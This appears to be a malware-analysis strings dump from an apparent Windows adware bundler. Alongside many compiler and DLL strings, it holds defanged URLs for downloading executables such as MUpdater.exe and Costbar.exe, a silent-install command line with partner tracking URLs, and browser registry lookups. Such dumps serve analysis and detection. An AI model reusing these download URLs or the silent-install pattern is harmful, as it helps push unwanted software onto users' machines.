f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
ADVAPI32.DLL
ADVAPI32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
("CRT Logic error during setenv",0)
("CRT Logic error during setenv",0)
__crtwsetenv
__crtwsetenv
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
MSPDB100.DLL
MSPDB100.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
strcpy_s(resultstr, resultsize, autofos.man)
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
__crtsetenv
__crtsetenv
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xstring
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xstring
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\vector
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\vector
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator *
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator *
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\memory
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\memory
std::vector,class std::allocator >,class std::allocator,class std::allocator > > >::operator []
std::vector,class std::allocator >,class std::allocator,class std::allocator > > >::operator []
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlconv.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlconv.h
hAtlThrow: hr = 0x%x
hAtlThrow: hr = 0x%x
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcore.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcore.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcoll.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcoll.h
c:\ipumper\ipumper\youtubeuploader\common\include\..\..\ThirdParty\ATLRegExp\atlrx.h
c:\ipumper\ipumper\youtubeuploader\common\include\..\..\ThirdParty\ATLRegExp\atlrx.h
WinHttpClient
WinHttpClient
std::vector >::operator []
std::vector >::operator []
std::_Vector_const_iterator > >::operator =
std::_Vector_const_iterator > >::operator =
std::_Vector_const_iterator > >::operator *
std::_Vector_const_iterator > >::operator *
std::_Vector_const_iterator > >::operator
std::_Vector_const_iterator > >::operator
{E4631BC4-65DE-4E77-A594-E81D5A671449}
{E4631BC4-65DE-4E77-A594-E81D5A671449}
iexplore.exe
iexplore.exe
--nopatching --silent --rfr=789249 --rfr_homepage=789185 --rfr_dse=789235 --rfr_vbm=789242 "--partner_homepage=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789185&info=x54&chid=2568&caid=268&type=mhome" "--partner_dse=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789235&info=x54&chid=2569&caid=268&type=msearch" "--partner_vbm=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$SIG&ovr=$_OVR&ref=789242&info=x54&chid=2570&caid=268&type=mvbm"
--nopatching --silent --rfr=789249 --rfr_homepage=789185 --rfr_dse=789235 --rfr_vbm=789242 "--partner_homepage=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789185&info=x54&chid=2568&caid=268&type=mhome" "--partner_dse=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789235&info=x54&chid=2569&caid=268&type=msearch" "--partner_vbm=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$SIG&ovr=$_OVR&ref=789242&info=x54&chid=2570&caid=268&type=mvbm"
MUpdater.exe
MUpdater.exe
hXXp://s3-us-west-2.amazonaws.com/upperservice/MUpdater.exe
hXXp://s3-us-west-2.amazonaws.com/upperservice/MUpdater.exe
x37.Costbar.exe
x37.Costbar.exe
hXXp://clklink.ru/uploads2/4cf37c9a-f28c-439e-bc02-01691d609e58/x37.Costbar.exe
hXXp://clklink.ru/uploads2/4cf37c9a-f28c-439e-bc02-01691d609e58/x37.Costbar.exe
360TS.exe
360TS.exe
hXXps://s3-us-west-2.amazonaws.com/upperservice/360TS.exe
hXXps://s3-us-west-2.amazonaws.com/upperservice/360TS.exe
WebOptimumSetup.exe
WebOptimumSetup.exe
hXXp://bscodecs.com/direct/downfold/lp.php?pub=exc353gi&campid=s1
hXXp://bscodecs.com/direct/downfold/lp.php?pub=exc353gi&campid=s1
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xtree
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xtree
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator ==
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator ==
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator =
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator =
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator *
std::_String_const_iterator,class std::allocator >::operator =
std::_String_const_iterator,class std::allocator >::operator =
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\algorithm
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\algorithm
invalid operator
invalid operator
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator --
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcomcli.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcomcli.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
Warning: implicit LoadString(%u) failed
Warning: implicit LoadString(%u) failed
c:\%original file name%.exe
c:\%original file name%.exe
1.tmp.exe_3248:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
1.0.6, 6-Sept-2010
1.0.6, 6-Sept-2010
(VVV.memtest86.com). At the time of writing it is free (GPLd).
(VVV.memtest86.com). At the time of writing it is free (GPLd).
bzip2/libbzip2: internal error number %d.
bzip2/libbzip2: internal error number %d.
This is a bug in bzip2/libbzip2, %s.
This is a bug in bzip2/libbzip2, %s.
Please report it to me at: jseward@bzip.org. If this happened
Please report it to me at: jseward@bzip.org. If this happened
component, you should also report this bug to the author(s)
component, you should also report this bug to the author(s)
of that program. Please make an effort to report this bug;
of that program. Please make an effort to report this bug;
timely and accurate bug reports eventually lead to higher
timely and accurate bug reports eventually lead to higher
combined CRCs: stored = 0xx, computed = 0xx
combined CRCs: stored = 0xx, computed = 0xx
{0xx, 0xx}
{0xx, 0xx}
[%d: huff mtf
[%d: huff mtf
GetProcessWindowStation
GetProcessWindowStation
operator
operator
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
KERNEL32.dll
KERNEL32.dll
ole32.dll
ole32.dll
RegOpenKeyW
RegOpenKeyW
ADVAPI32.dll
ADVAPI32.dll
RegCloseKey
RegCloseKey
OLEAUT32.dll
OLEAUT32.dll
RegOpenKeyExW
RegOpenKeyExW
Kernel32.dll
Kernel32.dll
ShellExecuteW
ShellExecuteW
Shell32.dll
Shell32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
bin.exe
bin.exe
zcÃ
zcÃ
Hf%F{
Hf%F{
.Kkc!
.Kkc!
Fq.MD
Fq.MD
W/u.BX
W/u.BX
y^dP4.yc
y^dP4.yc
]S'.ab
]S'.ab
.PFM*C
.PFM*C
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
:.;4;8;
:.;4;8;
>!>%>)>->1>5>9>
>!>%>)>->1>5>9>
0 0$0(0,0004080
0 0$0(0,0004080
mscoree.dll
mscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
KERNEL32.DLL
KERNEL32.DLL
!"#$%&'()* ,-./0
!"#$%&'()* ,-./0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
7.24.4.6
7.24.4.6
xcd.exe
xcd.exe
1.tmp.exe_3248_rwx_00350000_00030000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
Sending request %S
Sending request %S
%S - transfer terminated
%S - transfer terminated
Error %d transferring %S
Error %d transferring %S
Status code %d returned from %S
Status code %d returned from %S
Trying to redirect from %S to %S
Trying to redirect from %S to %S
AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d
AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d
Query Data: Error %d encountered (%S)
Query Data: Error %d encountered (%S)
Read Data: Error %d encountered (%S)
Read Data: Error %d encountered (%S)
AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.
AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSetStatusCallback
WinHttpSetStatusCallback
Download %S ended
Download %S ended
Download from %S failed, status=%d, error=%d
Download from %S failed, status=%d, error=%d
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ShellExecuteExW
ShellExecuteExW
"'\?&= %,/:!#$;[]()
"'\?&= %,/:!#$;[]()
Process=%S command=%S verb=%S, result=%d
Process=%S command=%S verb=%S, result=%d
operator
operator
GetProcessWindowStation
GetProcessWindowStation
C:\Amon\Current\BootStrapper\Release\Bundle.pdb
C:\Amon\Current\BootStrapper\Release\Bundle.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpSetOption
WinHttpSetOption
WinHttpOpen
WinHttpOpen
WinHttpSendRequest
WinHttpSendRequest
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpConnect
WinHttpConnect
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpReceiveResponse
WinHttpReceiveResponse
WINHTTP.dll
WINHTTP.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
.?AVAsyncWinHttp@@
.?AVAsyncWinHttp@@
zcÃ
zcÃ
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
8€8S8
8€8S8
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
shlwapi.dll
Winhttp.dll
Winhttp.dll
5Winhttp.dll
5Winhttp.dll
ibnd.txt
ibnd.txt
.amonin
.amonin
st.co
st.co
ex.php
ex.php
instid[%s]
instid[%s]
%S.ini
%S.ini
Wamitest.txt
Wamitest.txt
Send Report Status
Send Report Status
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
yadvapi32.dll
yadvapi32.dll
Iphlpapi.dll
Iphlpapi.dll
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection
v1.1.4322
v1.1.4322
v2.0.50727
v2.0.50727
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
NT%d.%dSP%d
nadvapi32.dll
nadvapi32.dll
%ProgramFiles%\Mozilla Firefox\firefox.exe
%ProgramFiles%\Mozilla Firefox\firefox.exe
%localappdata%\Google\Chrome\Application\chrome.exe
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
shell32.dll
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d
%%X
%%X
Wversion.dll
Wversion.dll
version.dll
version.dll
ole32.dll
ole32.dll
OleAut32.dll
OleAut32.dll
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
1.0.0.1
1.0.0.1
Setup.exe
Setup.exe
amisetup7849__99999_il2.exe_3340:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
1.0.6, 6-Sept-2010
1.0.6, 6-Sept-2010
(VVV.memtest86.com). At the time of writing it is free (GPLd).
(VVV.memtest86.com). At the time of writing it is free (GPLd).
bzip2/libbzip2: internal error number %d.
bzip2/libbzip2: internal error number %d.
This is a bug in bzip2/libbzip2, %s.
This is a bug in bzip2/libbzip2, %s.
Please report it to me at: jseward@bzip.org. If this happened
Please report it to me at: jseward@bzip.org. If this happened
component, you should also report this bug to the author(s)
component, you should also report this bug to the author(s)
of that program. Please make an effort to report this bug;
of that program. Please make an effort to report this bug;
timely and accurate bug reports eventually lead to higher
timely and accurate bug reports eventually lead to higher
combined CRCs: stored = 0xx, computed = 0xx
combined CRCs: stored = 0xx, computed = 0xx
{0xx, 0xx}
{0xx, 0xx}
[%d: huff mtf
[%d: huff mtf
GetProcessWindowStation
GetProcessWindowStation
operator
operator
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
38 103 78
38 103 78
90 59 67 101 113 106 90 29
90 59 67 101 113 106 90 29
88 55 65 100 70 99 113 45 74
88 55 65 100 70 99 113 45 74
89 26 102 51 55 33 122 50 67
89 26 102 51 55 33 122 50 67
89 23 105
89 23 105
89 59 91 68 70
89 59 91 68 70
89 59 91 80 108 119 123 50
89 59 91 80 108 119 123 50
113 50 74 51 55 33 122 50 67
113 50 74 51 55 33 122 50 67
76 59 78 100 67 102 114 59
76 59 78 100 67 102 114 59
109 44 89
109 44 89
73 44 70 116 96 73 119 50 74
73 44 70 116 96 73 119 50 74
105 44 68 115 113
105 44 68 115 113
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
bin.exe
bin.exe
zcÃ
zcÃ
7.FT@
7.FT@
.Nl1~
.Nl1~
H#%F
H#%F
.Sjfgn
.Sjfgn
g".RV_
g".RV_
1.ABC
1.ABC
Jú!
Jú!
B$.kGt
B$.kGt
.Jtbsy,i
.Jtbsy,i
.tq:]
.tq:]
.kz|_
.kz|_
99999999995
99999999995
6y.Pth
6y.Pth
v.PMP
v.PMP
~'%cQ
~'%cQ
Q91LH.uk~f
Q91LH.uk~f
333333333331
333333333331
{.NE\
{.NE\
I%FST
I%FST
=B%xzW
=B%xzW
S4.WQ
S4.WQ
][%SC
][%SC
] .lS3
] .lS3
.IT@xA
.IT@xA
`9e%s
`9e%s
`y.HR
`y.HR
Q'.Lx
Q'.Lx
.hsB$;
.hsB$;
:.IU%
:.IU%
xd.KM
xd.KM
.IXI
.IXI
[7.uo
[7.uo
) .tn
) .tn
98I%F
98I%F
:.Sky
:.Sky
.FY9~
.FY9~
R.B%X
R.B%X
|.xpd
|.xpd
%.WkX
%.WkX
JpN^.sL
JpN^.sL
&141,282
&141,282
2 2$2(2,20242~2
2 2$2(2,20242~2
3)4/454=4
3)4/454=4
0 0$0(0,0004080
0 0$0(0,0004080
mscoree.dll
mscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
10 67 50
10 67 50
29 68 51
29 68 51
63 127 26 97 35
63 127 26 97 35
25 83 36 69 28 94 15
25 83 36 69 28 94 15
30 83 39 84 21 90
30 83 39 84 21 90
25 115 4 101 28 126 47
25 115 4 101 28 126 47
26 75 34 69
26 75 34 69
!"#$%&'()* ,-./0
!"#$%&'()* ,-./0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
1.0.0.0
1.0.0.0
xcd.exe
xcd.exe
amisetup7849__99999_il2.exe_3340_rwx_023D0000_000B4000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
j5SSh
j5SSh
F(0%D
F(0%D
F,D%D
F,D%D
8%uEP3
8%uEP3
u.hUw
u.hUw
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
WinHttpSetStatusCallback
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Send progress update request %s
Progress Request for '%S' return %s
Progress Request for '%S' return %s
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zuDQ6rMsgvsbYPOcOM732vf9K4L9VSm4g0E=
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zuDQ6rMsgvsbYPOcOM732vf9K4L9VSm4g0E=
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4bu0fr2McfmAW/yiSaP89zx/WXHqhcD
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4bu0fr2McfmAW/yiSaP89zx/WXHqhcD
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4fp0/HhMob7BmbzwWvL/78=
xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4fp0/HhMob7BmbzwWvL/78=
%c%c%c%c
%c%c%c%c
VERSION.dll
VERSION.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
Secur32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpOpen
WinHttpOpen
WinHttpSetOption
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpReceiveResponse
WinHttpReceiveResponse
WINHTTP.dll
WINHTTP.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
.?AVAsyncWinHttp@@
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
telexes.compiles.1 = s 'Inst Class'
telexes.compiles.1 = s 'Inst Class'
CLSID = s '{4cf1ec1d-2055-4a46-b248-11fb57f52868}'
CLSID = s '{4cf1ec1d-2055-4a46-b248-11fb57f52868}'
telexes.compiles = s 'Inst Class'
telexes.compiles = s 'Inst Class'
CurVer = s 'telexes.compiles.1'
CurVer = s 'telexes.compiles.1'
ForceRemove {4cf1ec1d-2055-4a46-b248-11fb57f52868} = s 'Inst Class'
ForceRemove {4cf1ec1d-2055-4a46-b248-11fb57f52868} = s 'Inst Class'
ProgID = s 'telexes.compiles.1'
ProgID = s 'telexes.compiles.1'
VersionIndependentProgID = s 'telexes.compiles'
VersionIndependentProgID = s 'telexes.compiles'
val ServerExecutable = s '%MODULE_RAW%'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{de2deba6-37b4-4d2f-8a78-56effa49ba84}'
TypeLib = s '{de2deba6-37b4-4d2f-8a78-56effa49ba84}'
.sssh
.sssh
REÚ
REÚ
\.crr
\.crr
s1f-'
s1f-'
.DC l
.DC l
tweb
tweb
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
stdole2.tlbWWW(
msgWd
msgWd
keyNameW
keyNameW
urlW
urlW
url2d
url2d
YtcmdLineW
YtcmdLineW
P%CreateIconWW
P%CreateIconWW
iconUrlW
iconUrlW
regKeyWW
regKeyWW
CheckRegKeyW
CheckRegKeyW
